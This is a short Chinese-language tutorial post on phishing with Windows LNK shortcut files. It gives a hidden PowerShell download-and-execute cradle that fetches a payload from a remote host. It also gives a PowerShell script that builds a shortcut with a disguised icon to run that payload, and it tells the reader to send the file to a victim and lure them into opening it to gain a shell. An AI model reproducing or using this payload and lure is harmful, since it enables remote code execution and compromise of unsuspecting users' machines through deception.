文章前言
LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell命令
钓鱼实践
Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch生成代码
powershell.exe -nop -w hidden -c \\\"IEX ((new-object net.webclient).downloadstring(\\\'http://192.168.174.129:80/a\\\'))\\\"
Step 2:制作一下txt文本
Step 3:制作一下powershell
$file = Get-Content \\\"Al1ex.txt\\\"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(\\\"Al1ex.lnk\\\")
$Shortcut.TargetPath = \\\"%SystemRoot%\\\\system32\\\\cmd.exe\\\"
$Shortcut.IconLocation = \\\"%SystemRoot%\\\\System32\\\\Shell32.dll,21\\\"
$Shortcut.Arguments = \\\' \\\'+ $file
$Shortcut.Save()
Step 4:运行Al1ex.ps1,之后生成LNK文件
Step 5:后将Al1ex.lnk发送给受害者,诱导用户运行
Step 6:之后成功获得Shell
文末小结
基于LNK文件的钓鱼方式总体而言利用难度相对有点大,一般都需要通过钓鱼邮件的方式(例如:投递压缩包并附加Link文件)进行利用,不过作为一种后渗透阶段权限维持的方式也还是挺不错的,但是就得看点击率了~
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34200.html